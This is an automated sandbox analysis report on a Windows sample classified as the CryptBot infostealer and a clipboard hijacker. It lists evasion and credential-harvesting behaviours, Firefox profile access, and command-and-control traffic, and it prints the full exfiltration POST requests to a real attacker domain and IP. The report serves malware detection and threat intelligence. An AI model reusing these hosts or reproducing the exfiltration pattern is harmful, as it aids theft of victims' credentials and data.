Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561635
MD5: ce1c81d721906475fc878ebd26d09ad4
SHA1: 2fd29c1c343af0ffc67441b448e8a101b7f7854e
SHA256: a80ca2e11b0eaa75711ca4b8a002d95f45e8dbaf41101e4dfc52b32ab5d9ddae
Tags: exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_004F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BD914B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 8_2_6BD914B0
Source: file.exe, 00000000.00000003.1700231599.0000000007172000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_a30f3dcd-2
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 8_2_004F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BE26BF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6BE6F960h 8_2_6BDAEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BDBA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6BDBA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6BDBA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BE5C920
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BDB0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDF6F29
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDF6F25
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDF6F21
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6BDE8CE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6BE6D014h] 8_2_6BE64360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6BDB0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 8_2_6BDEA1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6BDB0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 8_2_6BE30730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BDBE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6BDBE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BDBA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6BDBA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 8_2_6BDBA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 8_2_6BDBC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6BE384A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDCBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDCBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 8_2_6BDBD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6BE03840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BE07E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then movzx edx, byte ptr [esp+14h] 8_2_6BDF7D9F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then movzx edx, byte ptr [esp+14h] 8_2_6BDF7D95
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then movzx edx, byte ptr [esp+14h] 8_2_6BDF7D91
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 8_2_6BE07D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 8_2_6BE27350
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6BDBD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6BDAB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6BE0B1F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 8_2_6BE33140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 8_2_6BDBD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6BE6DFF4h 8_2_6BE03690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 8_2_6BDBD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_6BE09600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 8_2_6BDBD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 8_2_6BE0B4D0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49751 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49737 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 34.116.198.130:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------VKBaGNiaIl9bz6Oq5IF3uLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 4b 42 61 47 4e 69 61 49 6c 39 62 7a 36 4f 71 35 49 46 33 75 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 61 77 6f 73 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a e0 6a d2 20 87 b5 dd 9b 41 33 d7 4e ad c8 60 6d 68 76 cf b1 7b 49 d5 40 9f 58 e1 4e 81 c5 86 e8 f5 b1 b0 48 52 95 ae 52 73 d3 b6 e2 5b 17 01 29 52 81 32 5c a9 e2 a3 20 ef cc 95 a7 01 80 cb 1d 6d 40 17 5c 54 f4 5f 92 f3 08 ea 29 f8 bb 8c 97 ef d3 26 2c 7d 80 d8 de 82 79 4e cc 2c d9 cf 49 4f 0f 2a b2 2f 79 f0 4b c9 d0 be 57 03 0a 3f b8 b3 8c 39 62 15 f8 98 08 bd 05 99 48 66 ec a7 f2 97 c3 1d a6 b6 25 d0 81 21 11 5b 3e 28 24 95 59 e8 4e 6f 9a bf d5 8b a0 bc 7a 95 ed 46 62 a5 21 93 fd 9a 3f 92 83 4f f1 5d 37 43 de f5 a8 2e fe 8f d1 75 4f 66 99 38 6b 18 97 c4 53 47 9d 4f 81 15 66 d5 f4 8f f8 3c a9 17 00 c2 ba c0 a5 a4 f5 cc 55 ed f1 be d2 1e a2 71 a3 dc ec be 84 42 d5 f5 41 4e 7c 5b cc 59 bb f6 88 f0 ce 1a a4 ac 86 d9 7d 18 db 27 be 4d 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 4b 42 61 47 4e 69 61 49 6c 39 62 7a 36 4f 71 35 49 46 33 75 4c 2d 2d 0d 0a Data Ascii: --------------------------VKBaGNiaIl9bz6Oq5IF3uLContent-Disposition: form-data; name="file"; filename="Kawoso.bin"Content-Type: application/octet-streamj A3N`mhv{I@XNHRRs[)R2\ m@\T_)&,}yN,IO*/yKW?9bHf%![>($YNozFb!?O]7C.uOf8kSGOf<UqBAN|[Y}'M--------------------------VKBaGNiaIl9bz6Oq5IF3uL--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63872Content-Type: multipart/form-data; boundary=------------------------byKIMhvWeexagxzneTss7GData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 62 79 4b 49 4d 68 76 57 65 65 78 61 67 78 7a 6e 65 54 73 73 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 61 74 69 66 65 70 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ae 35 cc f8 5b 14 c1 ff c3 8e 47 57 c7 5d c1 bd cd 34 2e f3 5f d2 46 a8 52 a7 c5 30 e0 8c a4 06 9b b3 a5 b1 3a 64 bd 89 55 a7 bf 5f 83 1a 6e f2 64 43 c1 d0 16 c8 75 66 14 4e 93 99 0b 12 b0 ac 67 86 32 eb f5 0e 15 4f 91 73 8a 9f db 25 74 13 37 79 00 e3 b3 f3 c2 36 27 93 5f 56 32 05 43 ed 26 a4 d5 73 bb 9e 5b 2c c3 aa 29 9b 8a da 80 07 c1 5f 25 92 3f b2 e8 16 83 47 8d 15 d5 a9 4b f5 80 bc 3f a3 6b a5 98 4d c7 0b 32 65 43 69 d6 35 b7 34 6f 54 57 eb a3 c9 ee a4 26 40 04 ca 91 43 2d 4e 43 37 97 8a ef ab 56 da ca 79 07 05 fc 76 44 7c c1 28 9d fd 2c c0 49 21 cf e9 c2 31 3f 9b b9 d5 c4 98 3d 03 2d 28 76 2b 36 5f 09 50 09 8d 2d 74 76 6b e5 74 35 8f 52 3b 0a a0 4b f9 6b b3 94 ff 71 aa e4 09 19 7c 9a 54 d3 e1 e0 95 7f 63 56 20 95 d0 db 8d d3 74 00 88 aa 49 09 0b 1c 3f 8d f1 e1 58 0b 96 75 79 23 44 1d 0a 2e 78 06 0d bf ac 7d 10 3a 3a 77 2c 33 9b 55 ed a9 4f de ec 9c 36 d2 cf d1 f1 a3 af e0 41 e6 84 04 6a 72 90 f6 f6 ed c7 d4 03 16 01 c3 a7 2f 5b 3c d7 bf 3e 68 d2 e1 38 a8 74 9d 2b b6 90 b0 66 de af 25 75 e3 0c e4 a0 f7 96 07 52 df 8e 4b 83 7d cf 70 e7 c3 b0 63 14 63 d1 aa e2 18 5c cc 40 dd 9c df 1b 8b 00 be da 02 ff 02 dc d0 19 75 1c fc c4 4a 01 1c 48 35 af 6a 38 ad d6 fd 5a aa c5 44 8c e7 5c 5e cc 05 fe 8b 6f cc 5d f8 fb a7 b9 9f 97 81 a4 86 f8 db 31 08 d2 d9 fb 16 89 d6 de 3a 09 98 0d 1e 9a 85 39 a7 b1 1b 46 37 fa e8 78 82 fd bc 4f d9 4b 77 ac b4 bd 95 ac 46 ac e5 4a 1d 6a 36 20 80 a1 66 7c 98 01 f6 24 59 f0 59 b6 7f 6e ad 32 16 9f c5 17 d1 7e ff 37 15 0e 63 a7 76 db 16 74 f8 11 0d 2b 2d fe 8f e6 2d 2f 3a 60 3f 90 1f 33 ff d9 41 06 1c 0a 3b 19 5b fe b4 92 61 f1 49 2f 32 f4 2a 84 90 3a b4 46 2a c5 74 74 7e b9 ed 1a 08 4f db 0e ad 9d 0e f2 af a9 25 0b 0f 47 2a 8b 9d 67 07 74 16 e7 d4 3f 93 f0 80 dc ef 56 92 96 9e 11 ff 44 40 31 61 f4 a9 45 62 39 2f 0f 70 78 b0 76 35 d9 32 1d 0f e9 21 68 bb f0 ca d4 2b 08 46 f7 c8 7a 93 b6 13 83 3d 5d 0f 24 10 37 30 16 ed f3 77 86 0f 1e 4a 07 4f c1 30 2a 69 39 55 1f 60 28 d0 41 2e 35 48 1e 3d 95 ac 88 66 51 42 f9 4f bb a8 e1 20 7b 01 15 6b 57 21 1a 3c ab 9e 55 44 21 b3 03 37 cd f2 bb e0 46 9a da 8f 60 fe d9 ea 2a 3f d1 84 a9 49 3f 5d 30 90 f2 4c 86 4d 5e de 91 fe 6f 44 6a 91 25 86 15 9a 80 ee 08 fa d1 fe 69 1b f6 eb b1 71 bd e1 f3 eb 96 d2 3d c3 d8 f6 bb 43 ad 4d 4d 3b a0 e5 e0 8f c7 39 22 d7 95 b4 07 86 02 cc 35 07 16 35 50 8a 53 b2 aa a7 2a 1e 0c 00 53 1f f8 ce
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27817Content-Type: multipart/form-data; boundary=------------------------k9zXkSflM1ENuVJtWRpXpBData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6b 39 7a 58 6b 53 66 6c 4d 31 45 4e 75 56 4a 74 57 52 70 58 70 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 6f 71 6f 72 61 66 61 76 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 00 d6 89 00 21 1c 5e bf 18 1c d0 fc 8b 85 a3 5a 91 ac 7d 51 f6 8a 86 6f a0 c0 2d 76 9d fa ab 92 db 95 f7 b4 dc 8a 70 6d 6f 1f 70 8f 51 ba e5 b7 75 9c 0d 83 3e 2b 2c df 34 53 b7 ec 25 53 a2 22 87 53 a5 c7 c3 df f4 0d 0f 1a 71 45 06 b7 f4 58 7f eb 13 93 da 28 77 91 59 a7 81 a7 60 77 e6 58 4d ff 82 f0 9a 4c e3 38 04 92 b4 46 7c d7 49 7c 21 e0 39 15 a3 22 89 55 51 cd 8f 26 5b 42 a2 00 90 ee 23 75 ff 3e 53 83 a0 2b d5 5d 04 55 e4 71 a7 72 33 0f f5 75 a3 cc a7 36 b8 45 f2 52 9b 99 ed 2b ad b0 ec 8f e4 c2 14 49 18 59 cb 10 74 9f 1c 5f 91 ff 99 bf aa 17 7e 6a c6 69 dc a7 d9 fe be 2d 5f a2 27 03 cf 90 60 9c c7 ce e8 3f fe 69 43 84 de 22 4f cb e9 6c e7 16 2e df ed cd 85 ab 45 08 b5 d8 8f c9 2c 94 50 9f bc 75 9f f9 96 40 c7 2d 36 34 57 92 37 81 08 a4 cb 5f f3 4e 7e 96 19 99 3e ca 19 1b 81 f2 28 c5 4f 5e 75 2a c8 46 6a 14 5c 8f c4 04 19 e1 9f 21 5b 11 dc 88 5a 5f 22 63 b0 81 f9 44 89 7c f9 89 71 ac 73 bd d3 19 b3 a0 93 a1 c5 86 79 d0 c1 8b d7 d0 c8 7c 3c ed 7d 99 38 11 17 fc 14 a7 9c bb 90 7d 77 85 47 b2 85 64 50 d8 59 2c 41 63 3c 51 84 aa 0b 2d 54 ce 10 1c 74 32 4c 5a 8d 48 1d bc f1 26 f7 17 29 91 11 d2 77 82 b4 c5 87 17 36 da 32 91 6f 3c 00 67 2d 4b fa d9 96 4c ab 83 54 ab 69 48 54 8a 13 54 6b 0c b6 b2 7d 20 df 51 aa c2 04 6e ae ee d8 21 fc cb d1 b8 d4 60 ca a2 e2 0f d9 0e ac 72 60 2d 6d ea 58 ed b8 d4 76 7d c6 a5 21 4a f8 bd 1a 49 48 c8 66 57 2e 59 a2 ce 07 0b 47 5c db 0e a1 ba b0 ba 66 30 cf c9 74 ef f3 2f aa 9e 5f bd 85 fc 84 2b 5e da dd 82 39 15 e8 b6 77 54 73 a6 e7 2c 30 29 fe 05 e9 c4 ff 9b e1 7f aa 76 e4 1d b8 60 c6 7b 3a c6 74 9f bc 4d c5 e5 e7 b2 21 73 9f b6 a5 5a 58 23 fd 80 90 52 35 66 64 a3 d7 b0 34 85 d7 b2 82 c0 0e 23 b7 d9 11 d1 24 f0 d3 50 b6 8c d1 e5 68 87 c0 fa e3 b4 66 1d 1b f7 c6 cd 19 71 9a 83 8a 93 6b ac 23 1e 7c b7 5a a4 e3 ff 7b df a7 2d 6a 20 7d 49 db 7f b9 a0 12 f5 12 6a 28 79 9d 7d 1e 6c bf 64 f7 2e cc 1e 96 7e 7b 21 42 73 37 2f 9e bf 07 26 46 bd ad 73 28 c2 00 94 94 8a 01 c6 86 60 a9 05 c3 c5 30 f8 40 2b 3c ff 42 43 54 47 f0 9a e3 3a 4e 5d 03 04 e1 e5 a3 f6 47 b9 74 96 76 aa 3e ae e0 7d 11 93 8a bd 16 c0 89 25 ca 75 90 43 5c 90 e0 d8 c2 db ef 37 b3 14 a2 0e ae d3 11 b5 11 1d f8 bc 8b fc b5 ab 62 d2 5b 86 63 ea 90 40 c7 d1 a0 63 79 64 e2 fa ef 65 46 a1 17 52 d6 93 95 d4 1d ec 10 12 94 93 20 1f 2b df c0 23 3c 51 a2 7b 17 d4 ca e4 01 41 27 e5 b7 54 a8 e2 8a 1f e8 5d
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2026880625.000072B40284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2062914144.000072B40263C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.2038353879.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2038468542.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2038608273.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.2038353879.000072B403144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2038468542.000072B403114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2038608273.000072B4025B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 